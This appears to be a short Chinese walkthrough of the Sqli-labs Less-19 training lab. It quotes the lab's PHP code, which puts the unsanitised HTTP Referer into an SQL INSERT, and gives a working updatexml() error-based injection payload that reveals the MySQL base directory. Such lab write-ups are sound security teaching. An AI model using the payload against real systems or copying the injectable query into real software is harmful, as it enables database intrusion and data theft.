从源代码中我们可以看到我们获取到的是HTTP_REFERER

$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
echo 'Your Referer is: ' .$uagent;
print_r(mysql_error());			

那和less18是基本一致的,我们从referer进行修改。

还是像less18一样,我们只给出一个示例

将referer修改为

1' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),1) and '1'='1

Sqli-labs Less-19 Referer注入 updatexml()报错注入

可以看到mysql的路径了。

请发散思维思考其他的呦。

 

参考:https://www.cnblogs.com/lcamry/p/5763029.html

 

相关文章:

  • 2021-10-19
  • 2021-06-20
  • 2021-12-24
  • 2021-07-28
  • 2022-01-24
  • 2022-02-25
  • 2021-08-02
  • 2021-11-20
猜你喜欢
  • 2021-06-05
  • 2021-11-24
  • 2021-08-07
  • 2021-10-01
  • 2021-11-10
  • 2022-02-26
  • 2022-12-23
相关资源
相似解决方案